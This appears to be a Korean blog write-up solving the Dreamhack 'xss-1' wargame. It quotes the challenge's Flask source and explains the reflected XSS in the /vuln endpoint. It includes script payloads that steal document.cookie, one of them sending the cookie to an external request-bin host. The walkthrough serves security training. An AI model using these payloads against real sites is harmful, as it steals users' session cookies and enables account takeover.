xss-1
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.
XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다
* [Dreamhack] Exercise: XSS
# 문제 목표 및 기능 요약
- 목표: XSS를 통해 이용자의 쿠키를 탈취하는 것
# 엔드포인트: /vuln
- 이용자가 전달한 xss 파라미터의 값을 출력
@app.route("/vuln")
def vuln():
param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
return param # 이용자의 입력값을 화면 상에 표시
# 엔드포인트: /memo
- 이용자가 전달한 memo 파라미터 값을 render_template 함수를 통해 기록하고 출력
@app.route('/memo') # memo 페이지 라우팅
def memo(): # memo 함수 선언
global memo_text # 메모를 전역변수로 참조
text = request.args.get('memo', '') # 사용가 전송한 memo 입력값을 가져옴
memo_text += text + '\n' # 사용가 전송한 memo 입력값을 memo_text에 추가
return render_template('memo.html', memo=memo_text) # 사이트에 기록된 memo_text를 화면에 출력
# 엔드포인트: /flag
- flag 페이지를 구성하는 코드
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome("/chromedriver", options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'- 메소드에 따른 요청마다 다른 기능을 수행
> GET: 이용자에게 URL을 입력받는 페이지를 제공
> POST: params 파라미터에 값과 쿠키를 포함 + check_xss 함수 호출
* check_xss: read_url 함수를 호출해 vuln 엔드포인트에 접속
# 취약점 분석
- vuln과 memo 엔드포인트는 이용자의 입력값을 페이지에 출력
- memo: render_template 함수를 사용해 memo.html을 출력
- render_template 함수는 전달된 템플릿 변수를 기록할 때 HTML 엔티티코드로 변환해 저장하기 때문에 XSS가 발생하지 않음. 그러나 vuln은 이용자가 입력한 값을 그대로 출력하기 때문에 XSS가 발생
@app.route("/vuln")
def vuln():
param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
return param # 이용자의 입력값을 화면 상에 표시vuln 함수
# 익스플로잇
- 문제를 해결하기 위해서는 /vuln 엔드포인트에서 발생하는 XSS 취약점을 통해 임의 이용자의 쿠키를 탈취해야 함
- 탈취한 쿠키를 전달받기 위해서는 외부에서 접근 가능한 웹 서버를 사용하거나 문제에서 제공하는 memo 엔드포인트를 사용할 수 있음
- 공격에 사용할 수 있는 속성
# 쿠키 탈취
① memo 페이지 사용
- flag 엔드 포인트에서 다음과 같은 익스 플로잇 코드를 입력하면, memo 엔드포인트에서 임의 이용자의 쿠키 정보를 확인할 수 있음
<script>location.href = "/memo?memo=" + document.cookie;</script>
② 웹 서버 사용
- 외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수 있음
- 외부에서 접근 가능한 웹 서버가 없다면 드림핵 툴즈 서비스를 사용할 수 있음
> 해당 툴즈 서비스에서 제공하는 Request Bin 기능은 이용자의 접속 기록을 저장하기 때문에 해당 정보 확인 가능
> Request Bin 버튼을 클릭하면 랜덤한 URL이 생성되며, 해당 URL에 접속한 기록을 저장
- flag 기능에서 다음 코드를 입력하면 접속 기록에 포함된 FLAG 확인 가능
<script>location.href = "http://RANDOMHOST.request.dreamhack.games/?memo=" + document.cookie;</script>
# 추가적 분석
- /vuln
vuln 페이지 클릭 시 param으로 입력된 값이 그대로 들어간다
script에 대한 필터링이 없고 자바스크립트가 동작한다
- /memo
클릭할 때마다 hello가 추가되는 것을 확인할 수 있다
- 소스코드 분석
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome("/chromedriver", options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)1. flag에서 param 값을 입력하면 submit 할 시 FLAG값을 쿠키에 심어서
127.0.0.1:8000 도메인으로 열린 브라우저에 저장
2. flag에 입력한 param을 통해 완성된 url로 브라우저를 띄움
3. 2번 과정에서 쿠키에 FLAG가 심어지므로 url 즉, param에 입력한 값을 통해 memo에 기록을 남길 수 있음
<script>location.href = "/memo?memo=" + document.cookie;</script> 입력 후 제출을 누름
다시 memo 페이지로 이동해보면 flag가 출력된 것을 확인할 수 있음
'War Game & CTF > Dreamhack' 카테고리의 다른 글
| [Dreamhack] CSRF-1 (0) | 2022.03.01 |
|---|---|
| [Dreamhack] xss-2 (0) | 2022.02.12 |
| [Dreamhack] funjs (0) | 2022.01.31 |
| [Dreamhack] session-basic (0) | 2022.01.24 |
| [Dreamhack] cookie (0) | 2022.01.24 |
